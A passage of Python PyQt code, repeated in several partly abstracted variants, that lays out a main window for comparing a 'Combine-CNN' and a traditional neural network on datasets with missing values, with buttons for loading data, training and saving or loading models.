resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n\n def chooseData(self):\n if self.sender() is self.dataFileChooseButton:\n self.fname['New'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n elif self.sender() is self.dataFileChooseButtonT:\n self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n return\n <function token>\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n <function token>\n\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n <function token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n <function token>\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'New'))\n elif self.sender() is self.judgeResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'Tra'))\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.windowLength = 1250\n self.windowHigh = 900\n self.fname = dict()\n self.fname['New'] = None\n self.fname['Tra'] = None\n self.dataLossRate = dict()\n self.dataSetLossValue = dict()\n self.dataFor = dict()\n self.dataFor['New'] = None\n self.dataLossRate['New'] = 0.0\n self.dataSetLossValue['New'] = 0.0\n self.dataFor['Tra'] = None\n self.dataLossRate['Tra'] = 0.0\n self.dataSetLossValue['Tra'] = 0.0\n self.traingWidgetOnFlag = dict()\n self.traingWidgetOnFlag['New'] = False\n self.traingWidgetOnFlag['Tra'] = False\n self.combineNumConv = 2\n self.convCoreNum = 5\n self.combineNumPooling = 4\n self.fullConnectOutInRate = 0.5\n self.mcbcnn = None\n self.trann = None\n self.trainingW = None\n self.trainingWT = None\n self.initUI()\n self.initConnect()\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n <function token>\n <function token>\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n <function token>\n\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n <function token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n <function token>\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'New'))\n elif self.sender() is self.judgeResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'Tra'))\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n <function token>\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n 